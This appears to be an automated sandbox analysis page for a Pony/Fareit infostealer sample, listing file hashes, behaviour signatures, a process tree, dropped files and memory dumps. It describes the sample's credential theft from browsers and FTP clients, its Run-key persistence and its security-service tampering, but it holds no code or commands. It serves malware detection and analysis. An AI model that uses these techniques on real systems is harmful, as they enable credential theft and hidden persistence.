Overview

overview

10

Static

static

3

82a288eea6...c7.exe

windows7-x64

10

82a288eea6...c7.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    142s
  • max time network
    126s
  • platform
    windows7_x64
  • resource
    win7-20231129-en
  • resource tags

    arch:x64arch:x86image:win7-20231129-enlocale:en-usos:windows7-x64system
  • submitted
    01/02/2024, 02:17

Sharing

Copy URL Twitter E-mail
Report Analysis Logs

General

  • Target

    82a288eea617ea4bda22817e3e6509c7.exe

  • Size

    273KB

  • MD5

    82a288eea617ea4bda22817e3e6509c7

  • SHA1

    4a238899b0c921540f30f7129312e9f928ab1038

  • SHA256

    45fd11c98bde6bc2670c73ab890cc623b6784632c535eb19d0dae3ebc8ce0408

  • SHA512

    1c4d3332dd42da74328b087aa40a328887e558360e36bfde7bd458e2ed532936eba33f302caceba0c92634376d820fb43a66c563150f254e52c088e10c65bf5e

  • SSDEEP

    6144:3jcANL1wec32khosSqIh6hRAQTmNtfPO5W18t4A6jWB8T3Kc:3jP+ecFhohhhORr+VPm48t5ibt

Score
10/10
ponydiscoveryevasionpersistenceratspywarestealerupx

Malware Config

Signatures

  • Modifies security service 2 TTPs 1 IoCs
    evasion
  • Pony,Fareit

    Pony is a Remote Access Trojan application that steals information.

    ratspywarestealerpony
  • Disables taskbar notifications via registry modification
    evasion
  • Modifies Installed Components in the registry 2 TTPs 1 IoCs
    persistence
  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 2 IoCs
  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

    spywarestealer
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • UPX packed file 7 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

    upx
  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

    discovery
  • Drops file in Program Files directory 3 IoCs
  • Modifies registry class 5 IoCs
  • Suspicious behavior: EnumeratesProcesses 14 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 15 IoCs
  • Suspicious use of FindShellTrayWindow 28 IoCs
  • Suspicious use of SendNotifyMessage 18 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs
  • System policy modification 1 TTPs 2 IoCs
    evasion
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence

Processes

  • C:\Users\Admin\AppData\Local\Temp\82a288eea617ea4bda22817e3e6509c7.exe
    "C:\Users\Admin\AppData\Local\Temp\82a288eea617ea4bda22817e3e6509c7.exe"
    1⤵
    • Modifies security service
    • Loads dropped DLL
    • Adds Run key to start application
    • Drops file in Program Files directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    • System policy modification
    PID:2088
    • C:\Users\Admin\AppData\Local\Temp\82a288eea617ea4bda22817e3e6509c7.exe
      C:\Users\Admin\AppData\Local\Temp\82a288eea617ea4bda22817e3e6509c7.exe startC:\Users\Admin\AppData\Roaming\D614A\FEB07.exe%C:\Users\Admin\AppData\Roaming\D614A
      2⤵
        PID:932
      • C:\Users\Admin\AppData\Local\Temp\82a288eea617ea4bda22817e3e6509c7.exe
        C:\Users\Admin\AppData\Local\Temp\82a288eea617ea4bda22817e3e6509c7.exe startC:\Program Files (x86)\4A9C1\lvvm.exe%C:\Program Files (x86)\4A9C1
        2⤵
          PID:2036
        • C:\Program Files (x86)\LP\07BD\8D90.tmp
          "C:\Program Files (x86)\LP\07BD\8D90.tmp"
          2⤵
          • Executes dropped EXE
          PID:1336
      • C:\Windows\system32\msiexec.exe
        C:\Windows\system32\msiexec.exe /V
        1⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:2568
      • C:\Windows\explorer.exe
        explorer.exe
        1⤵
        • Modifies Installed Components in the registry
        • Modifies registry class
        • Suspicious behavior: GetForegroundWindowSpam
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of SendNotifyMessage
        PID:904

      Network

            MITRE ATT&CK Enterprise v15

            Replay Monitor

            Loading Replay Monitor...

            Downloads

            • C:\Users\Admin\AppData\Roaming\D614A\A9C1.614
              Filesize

              996B

              MD5

              3f4db16f7bbbc701dfdb12d8d77c47c0

              SHA1

              ee9cfc8a7bdc67f394171d13b1efb2bffca9c15a

              SHA256

              1bd88056729b61dc16bc7d97334b71a729f2da9ae931a5bb501f87b6462ffef9

              SHA512

              0e71393e6eac3637449629841ff75f9446cdcdef3e1caeed6e6043c289eaefe62b93948d6b2e21a65d2c021c06c09abe26e04ec502533e8b8876cb16476e3427

              Download Submit

            • C:\Users\Admin\AppData\Roaming\D614A\A9C1.614
              Filesize

              1KB

              MD5

              afe0aa72c4afe0dece66048333586f7c

              SHA1

              dd0491778d4f615bc93fc90ddb6abbdcc51af0be

              SHA256

              2593f23de25ea331459d65b3a629d1ed1735c216ca0c88dba9fa1c3cad7e76b6

              SHA512

              0e0c065e5a2792ff03bc69dd658e1208651eed4d371b63ddb57f945a9333a8aa6edae8ab01ab61e6dc82735cf5494383dbbf57f4737f123d57764b3a298e039f

              Download Submit

            • C:\Users\Admin\AppData\Roaming\D614A\A9C1.614
              Filesize

              600B

              MD5

              cf811889e6025da955101d8434a92105

              SHA1

              c633809a6195971f133f1f9674371f68c0d4e6c3

              SHA256

              18837a7174fe089e1f7c778007a9c38ea749b5ea1b5678622f53719bdc4be2ff

              SHA512

              6fdb5132d8dca74919ddc1480c06c480d1159bf5bcb7dcc9edba26bf536ec9ff9d55434fd93d3d92723a66a640592b2985059aab3116abb54330b2aa71e738eb

              Download Submit

            • \Program Files (x86)\LP\07BD\8D90.tmp
              Filesize

              105KB

              MD5

              1c2bce0519de8357c7cb082d1be5ef2d

              SHA1

              d6619d654247eab6ea0e15b935e51d6048ab61fd

              SHA256

              89b05808a3d33c0cc66d7ea408fd51021e014361ec0743d12d2b9c158265ec9c

              SHA512

              c7673ebba591e5e6ca9c7d93dd51ec1c92ed2ad215cf20ed4b62abff9ee54117326118ff8c0c78e6028ea4b70b62a7c1648112ebbed5c6428558d366819c876e

              Download Submit

            • memory/904-339-0x00000000043F0000-0x00000000043F1000-memory.dmp

              Filesize

              4KB

              Download

            • memory/904-317-0x00000000043F0000-0x00000000043F1000-memory.dmp

              Filesize

              4KB

              Download

            • memory/932-13-0x0000000000400000-0x000000000046D000-memory.dmp

              Filesize

              436KB

              Download

            • memory/932-14-0x0000000001CA0000-0x0000000001CE6000-memory.dmp

              Filesize

              280KB

              Download

            • memory/1336-337-0x0000000000400000-0x000000000041D000-memory.dmp

              Filesize

              116KB

              Download

            • memory/1336-335-0x00000000004C0000-0x00000000005C0000-memory.dmp

              Filesize

              1024KB

              Download

            • memory/1336-334-0x0000000000400000-0x000000000041D000-memory.dmp

              Filesize

              116KB

              Download

            • memory/2036-144-0x0000000000400000-0x000000000046D000-memory.dmp

              Filesize

              436KB

              Download

            • memory/2036-145-0x0000000001CD0000-0x0000000001D16000-memory.dmp

              Filesize

              280KB

              Download

            • memory/2088-11-0x0000000000400000-0x000000000046D000-memory.dmp

              Filesize

              436KB

              Download

            • memory/2088-2-0x0000000000470000-0x0000000000570000-memory.dmp

              Filesize

              1024KB

              Download

            • memory/2088-142-0x0000000000400000-0x000000000046D000-memory.dmp

              Filesize

              436KB

              Download

            • memory/2088-336-0x0000000000400000-0x000000000046D000-memory.dmp

              Filesize

              436KB

              Download

            • memory/2088-146-0x0000000000470000-0x0000000000570000-memory.dmp

              Filesize

              1024KB

              Download

            • memory/2088-1-0x0000000000400000-0x000000000046D000-memory.dmp

              Filesize

              436KB

              Download

            • memory/2088-341-0x0000000000400000-0x000000000046D000-memory.dmp

              Filesize

              436KB

              Download